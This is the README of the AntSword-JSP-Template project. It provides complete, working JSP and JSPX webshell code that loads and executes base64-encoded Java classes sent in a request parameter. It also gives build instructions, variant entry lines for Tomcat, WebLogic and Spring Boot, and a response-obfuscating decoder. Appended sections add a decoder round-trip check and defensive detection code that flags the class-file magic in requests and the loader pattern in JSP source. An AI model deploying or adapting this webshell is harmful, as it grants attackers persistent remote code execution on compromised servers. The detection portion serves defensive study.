# AntSword-JSP-Template  v1.7

Source repository: https://github.com/AntSwordProject/AntSword-JSP-Template (Java; 32 commits, last pushed 2024-09-22)

AntSword (中国蚁剑) JSP one-liner webshell payload

Detailed write-up: https://yzddmr6.tk/posts/antsword-diy-3/

Build environment: JDK 1.5

Supported targets: JDK >= 1.5

## Compiling

### Manual build

* Windows

```
javac.exe Test.java

base64 -w 0 Test.class > Test.txt
```

(`base64` is not a built-in Windows command; the copy shipped with Git for Windows works. Alternatively, `certutil -encode Test.class Test.txt` produces the same encoding but adds BEGIN/END header lines and 64-column line breaks that must be stripped.)

* Linux/Mac

```bash
javac Test.java

# Linux
base64 -w 0 Test.class > Test.txt

# Mac
base64 -b 0 Test.class > Test.txt
```

### Automatic build

Set the path to your `javac` in build.py and run it; the code templates are generated under `./dist`.

```
#python2
python build.py

#python3
python3 build3.py
```

After the build, copy everything under `./dist/` to `antSword-master/source/core/jsp/template/`.

## Shell

shell.jsp

```
<%!
    // Custom loader: exposes the protected defineClass() so that raw class
    // bytes received in the request can be turned into a Class.
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    // Base64 decoding via reflection so one source works on JDK 5-8
    // (sun.misc.BASE64Decoder) and on JDK 9+ (java.util.Base64), where
    // sun.misc.BASE64Decoder no longer exists and the first branch throws.
    public byte[] base64Decode(String str) throws Exception {
      Class base64;
      byte[] value = null;
      try {
        base64=Class.forName("sun.misc.BASE64Decoder");
        Object decoder = base64.newInstance();
        value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
      } catch (Exception e) {
        try {
          base64=Class.forName("java.util.Base64");
          Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
          value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
        } catch (Exception ee) {}
      }
      return value;
    }
%>
<%
    // The compiled payload class arrives base64-encoded in the "ant" parameter.
    // It is defined, instantiated, and entered through its equals() method,
    // which receives the request and response to work with.
    String cls = request.getParameter("ant");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
    }
%>
```

shell.jspx

```
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
    <jsp:declaration>
        // Same loader as shell.jsp: exposes defineClass() for the received bytes.
        class U extends ClassLoader {
            U(ClassLoader c) {
                super(c);
            }
            public Class g(byte[] b) {
                return super.defineClass(b, 0, b.length);
            }
        }
        // Reflective base64 decode: sun.misc.BASE64Decoder on JDK 5-8,
        // java.util.Base64 on JDK 9+.
        public byte[] base64Decode(String str) throws Exception {
            Class base64;
            byte[] value = null;
            try {
                base64=Class.forName("sun.misc.BASE64Decoder");
                Object decoder = base64.newInstance();
                value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
            } catch (Exception e) {
                try {
                    base64=Class.forName("java.util.Base64");
                    Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
                    value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
                } catch (Exception ee) {}
            }
            return value;
        }
    </jsp:declaration>
    <jsp:scriptlet>
        // Define the class carried in the "ant" parameter and enter it via equals().
        String cls = request.getParameter("ant");
        if (cls != null) {
            new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
        }
    </jsp:scriptlet>
</jsp:root>
```

In both files the line

`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});`

can be replaced with

`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);`

This form works on Tomcat/WebLogic but not on containers such as Spring Boot that do not provide `pageContext`.

Or with

`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(request);`

This form works on Tomcat/Spring Boot/WebLogic and similar containers. It uses reflection to pull the response out of the request, which may fail on unusual containers.

The latter two forms are not recommended and may be removed in a future version.

## Decoders

Using the Reverse decoder as an example:

> This decoder reverses the data in the response body.

1. Write `AsoutputReverse.java` as follows:

```java
public class AsoutputReverse {
  String res;

  public AsoutputReverse(String str) {
    // Put the transformation of str here and assign the result to res
    res = new StringBuffer(str).reverse().toString();
  }

  // Keep the toString method as-is; do not change it
  @Override
  public String toString() {
    return res;
  }
}
```

2. Compile it and base64-encode the resulting .class file:

```
$ javac AsoutputReverse.java
$ base64 -w 0 AsoutputReverse.class
```

3. In AntSword, open the encoder settings and create a "decoder" with the following content:

```
/**
 * JSP::reverse decoder
 */

'use strict';

module.exports = {
  asoutput: () => {
    // base64 of your .class file goes here
    return `yv66vgAAADMAHgoACAATBwAUCgACABUKAAIAFgoAAgAXCQAHABgHA...`;
  },
  decode_buff: (data) => {
    // logic that decodes the response body
    return Buffer.from(data).reverse();
  }
}
```

Note that the two halves operate at different granularities: `StringBuffer.reverse()` on the server reverses characters, while `Buffer.reverse()` on the client reverses bytes. They agree only for single-byte output; a response containing multi-byte characters (for example Chinese filenames) needs a character-level reverse on the client side, i.e. decode the bytes to a string with the response charset first, then reverse.

## Changelog

### v 1.7

1. Fixed an error when MySQL table names contain special characters
2. Added file hashing
3. Tomcat 10 support; removed the dependency on third-party libraries

### v 1.6

1. `equals` accepts an array argument, for compatibility across containers
2. build.py can be told which version to compile for, so downloading a specific JDK is no longer necessary
3. Some variables moved to class fields for easier debugging
4. Fixed insert/update/delete statements not executing

### v 1.5

1. Decoder support (response encryption)
2. Fixed a base64 encoding problem and corrected typos
3. Changed how the current directory is determined
4. JDK 1.5 compatibility

### v 1.4

1. JDK 6 compatibility
2. Compatibility with WebLogic in-memory webshells
3. Improved error messages
4. Fixed garbled Chinese output on Windows (GBK is used on Windows, UTF-8 on Linux)
5. In practice a situation where only the response is available almost never occurs, so `response` alone is no longer supported as the entry argument, to reduce payload size
6. Added a web project for testing the payload
7. Fixed failure to determine the current directory when started with `java -jar xxx.war`

### v 1.3

1. Spring Boot compatibility

### v 1.2

1. Fixed a file download bug
2. Base64 encoding added for database operations

### v 1.1

1. Compatibility with Tomcat in-memory webshells
2. Compatibility with newer JDKs (7-14)

### v 1.0

1. Initial release
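The Reverse decoder above hides a mismatch worth checking: `new StringBuffer(str).reverse()` on the server reverses characters, while `Buffer.from(data).reverse()` in the client-side `decode_buff` reverses raw bytes. The added example below, JavaScript that is not part of AntSword or this template, simulates the server half, runs a constructed response through both the README's byte-level `decode_buff` and a character-level one, and shows where they diverge. It assumes the response is written as UTF-8 (per the v1.4 notes the template uses GBK on Windows, in which case `'gbk'` decoding would be needed instead).

```javascript
// Added example (not AntSword project code): byte-level vs character-level
// reverse for the JSP::reverse decoder. Assumes a UTF-8 response encoding.

// Stand-in for the server side. Java's new StringBuffer(str).reverse()
// reverses UTF-16 code units but keeps surrogate pairs intact, which for valid
// text equals reversing code points; the servlet then writes UTF-8 bytes.
function serverReverse(plaintext) {
  return Buffer.from(Array.from(plaintext).reverse().join(''), 'utf8');
}

// decode_buff as written in the README: reverses the bytes of the body.
function decodeBuffBytewise(data) {
  return Buffer.from(data).reverse();
}

// decode_buff that undoes the server's character-level reverse: decode the
// bytes to text first, reverse code points, then re-encode.
function decodeBuffCharwise(data) {
  const text = Buffer.from(data).toString('utf8');
  return Buffer.from(Array.from(text).reverse().join(''), 'utf8');
}

// Round-trip a response through both decoders and report whether each one
// recovers the original text.
function roundTrip(plaintext) {
  const wire = serverReverse(plaintext);
  const bytewise = decodeBuffBytewise(wire).toString('utf8');
  const charwise = decodeBuffCharwise(wire).toString('utf8');
  return {
    bytewise,
    charwise,
    bytewiseOk: bytewise === plaintext,
    charwiseOk: charwise === plaintext,
  };
}

// Constructed sample output: an ASCII listing and one with a Chinese filename.
const ASCII_LISTING = 'drwxr-xr-x  2 tomcat tomcat 4096 shell.jsp\n';
const CJK_LISTING = '-rw-r--r--  1 tomcat tomcat  484 文件.txt\n';
```

For `ASCII_LISTING` both decoders return the original text; for `CJK_LISTING` only the character-level one does, because reversing the UTF-8 bytes of a three-byte character leaves an invalid sequence that decodes to U+FFFD. The same applies to any decoder that transforms a Java `String` on the server: the client must reverse the transformation at the same level (characters or bytes) the server applied it.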
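For defenders, two checks follow directly from the mechanism in the Shell section. On the wire, the compiled payload class travels base64-encoded in a request parameter (`ant` by default, but the name is configurable), and every Java class file begins with the bytes `CA FE BA BE`, which is why the base64 in the decoder example above starts with `yv66vg`. On disk, the template combines a `ClassLoader` subclass, a `defineClass` call, a base64 decoder and `getParameter`, a combination that is rare in legitimate JSPs. The added example below, JavaScript that is not part of AntSword or this template, runs both checks over constructed request records and over a snippet of the shell source; the requests and the class payload are fabricated for the demo and are not real traffic or bytecode.

```javascript
// Added example (not AntSword project code): detection checks for the
// class-loading shell described above. Sample requests and the payload bytes
// are constructed for the demo.

// Every Java class file starts with this magic; base64 of it begins "yv66vg".
const CLASS_MAGIC = Buffer.from([0xca, 0xfe, 0xba, 0xbe]);

// Minimal application/x-www-form-urlencoded parser for query strings and POST
// bodies; returns [name, value] pairs in order. Malformed %-escapes are kept raw.
function parseForm(encoded) {
  const dec = (s) => {
    try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch { return s; }
  };
  const pairs = [];
  for (const part of encoded.split('&')) {
    if (!part) continue;
    const i = part.indexOf('=');
    pairs.push([dec(i < 0 ? part : part.slice(0, i)), dec(i < 0 ? '' : part.slice(i + 1))]);
  }
  return pairs;
}

// Returns {param, majorVersion} if any parameter base64-decodes to a class-file
// header (magic + minor + major + constant-pool count = 10 bytes), else null.
// The check is name-agnostic, so renaming the "ant" parameter does not evade it.
// Buffer.from(..., 'base64') skips non-alphabet characters, so ordinary text
// just decodes to junk bytes that fail the magic comparison.
function findClassParameter(encoded) {
  for (const [name, value] of parseForm(encoded)) {
    const bytes = Buffer.from(value, 'base64');
    if (bytes.length >= 10 && bytes.subarray(0, 4).equals(CLASS_MAGIC)) {
      return { param: name, majorVersion: bytes.readUInt16BE(6) };
    }
  }
  return null;
}

// Flags JSP/JSPX source that has all four ingredients of the template's loader.
const LOADER_MARKERS = [
  /extends\s+ClassLoader\b/,
  /\bdefineClass\s*\(/,
  /\bjava\.util\.Base64\b|\bsun\.misc\.BASE64Decoder\b/,
  /\bgetParameter\s*\(/,
];
function looksLikeClassLoaderShell(source) {
  return LOADER_MARKERS.every((re) => re.test(source));
}

// Run the wire check over request records; returns one finding per hit.
function triage(requests) {
  const findings = [];
  for (const r of requests) {
    const q = r.path.includes('?') ? r.path.slice(r.path.indexOf('?') + 1) : '';
    const hit = findClassParameter(q) || findClassParameter(r.body);
    if (hit) findings.push({ path: r.path, ...hit });
  }
  return findings;
}

// --- constructed sample data ---
// Fake payload: a valid 10-byte class header (major version 49 = Java 5, the
// template's stated compile target) followed by zero filler; not real bytecode.
const FAKE_CLASS_B64 = Buffer.concat([
  CLASS_MAGIC, Buffer.from([0x00, 0x00, 0x00, 0x31, 0x00, 0x1e]), Buffer.alloc(16),
]).toString('base64');

const SAMPLE_REQUESTS = [
  { method: 'POST', path: '/app/shell.jsp', body: 'ant=' + encodeURIComponent(FAKE_CLASS_B64) },
  // Same payload under a renamed parameter: still caught by the magic check.
  { method: 'POST', path: '/app/x.jsp', body: 'data=' + encodeURIComponent(FAKE_CLASS_B64) },
  // Benign: a value that is the 4-byte magic in base64 but far too short to be a class.
  { method: 'POST', path: '/app/login.jsp', body: 'user=alice&pass=yv66vg%3D%3D' },
  { method: 'GET', path: '/app/index.jsp?page=2', body: '' },
];

// The relevant lines of the template's shell.jsp, as a string, for the source check.
const TEMPLATE_SNIPPET = `
<%! class U extends ClassLoader { U(ClassLoader c) { super(c); }
      public Class g(byte[] b) { return super.defineClass(b, 0, b.length); } }
    public byte[] base64Decode(String str) throws Exception {
      Class base64 = Class.forName("java.util.Base64"); /* ... */ return null; } %>
<% String cls = request.getParameter("ant");
   if (cls != null) { new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response}); } %>`;
```

`triage(SAMPLE_REQUESTS)` reports the first two records and skips the login and index requests; `looksLikeClassLoaderShell(TEMPLATE_SNIPPET)` is true for the `.jsp` and `.jspx` variants alike, since both contain the same four markers. The wire check is the more robust of the two, because the payload cannot avoid the class-file magic without a different loading mechanism, whereas the on-disk markers can be rewritten.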